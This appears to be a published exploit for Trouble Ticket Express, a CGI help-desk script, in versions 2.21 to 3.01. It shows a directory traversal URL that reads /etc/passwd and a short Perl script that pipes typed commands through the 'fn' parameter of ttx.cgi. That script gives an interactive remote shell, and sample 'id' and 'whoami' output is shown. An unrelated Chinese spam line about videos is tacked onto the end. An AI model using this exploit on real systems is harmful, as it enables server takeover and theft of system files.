# Exploit Title: Trouble Ticket Express Remote Code Execution/Directory Traversal # Author: zombiefx > # Software Link: http://www.troubleticketexpress.com/download/ttx301.zip # Version: v3.01,v3.0,v2.24,v2.21 # Tested on: Linux # CVE : # Code: # This is only possible if an attachment input is available. # Directory Traversal Vuln is # http://localhost/cgi-bin/ttx.cgi?cmd=file&fn=../../../../../../etc/passwd # Simple perl code to run commands on the box # $ id # uid=0(httpd) gid=0(httpd) groups=0(httpd) # $ whoami # httpd #!/usr/bin/perl use warnings; use strict; use LWP::Simple; my $url = 'http://localhost/cgi-bin/ttx.cgi'; print '$ '; while (<>) { print get( $url . '?cmd=file&fn=|' . $_ . '|' ); print '$ '; }

这里只有精品视频